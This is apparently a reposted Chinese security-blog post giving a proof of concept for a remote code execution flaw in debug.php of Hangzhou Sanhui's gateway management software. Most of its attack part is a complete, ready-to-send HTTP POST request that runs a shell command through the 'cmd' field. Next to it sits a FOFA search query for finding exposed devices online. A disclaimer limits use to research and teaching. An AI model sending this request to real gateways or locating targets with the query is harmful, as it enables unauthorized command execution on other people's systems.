杭州三汇网关debug存在远程代码执行漏洞 poc

admin
admin
admin
138635
文章
114
评论
2024年8月13日23:53:57评论144 views字数 792阅读2分38秒阅读模式

漏洞描述

杭州三汇数字信息技术有限公司始创于1997年,是一家定位于国内公共安全与国家安全领域行业信息化建设的高科技企业,致力于公安行业信息化建设的技术研究、产品研发、系统集成和整体服务,debug.php存在远程代码执行漏洞。

资产信息

FOFA:body="text ml10 mr20" && title="网关管理软件"

漏洞复现|杭州三汇网关debug存在远程代码执行漏洞

漏洞复现

POC:

POST /debug.php HTTP/1.1Host: User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept-Encoding: gzip, deflate, brAccept: */*Connection: closeContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoDIsCqVMmF83ptmpContent-Length: 307

------WebKitFormBoundaryoDIsCqVMmF83ptmpContent-Disposition: form-data; name="comdtype"

1------WebKitFormBoundaryoDIsCqVMmF83ptmpContent-Disposition: form-data; name="cmd"

id------WebKitFormBoundaryoDIsCqVMmF83ptmpContent-Disposition: form-data; name="run"

------WebKitFormBoundaryoDIsCqVMmF83ptmp--

执行id:

漏洞复现|杭州三汇网关debug存在远程代码执行漏洞

原文始发于微信公众号(小白菜安全):漏洞复现|杭州三汇网关debug存在远程代码执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月13日23:53:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   杭州三汇网关debug存在远程代码执行漏洞 pochttps://cn-sec.com/archives/3064151.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息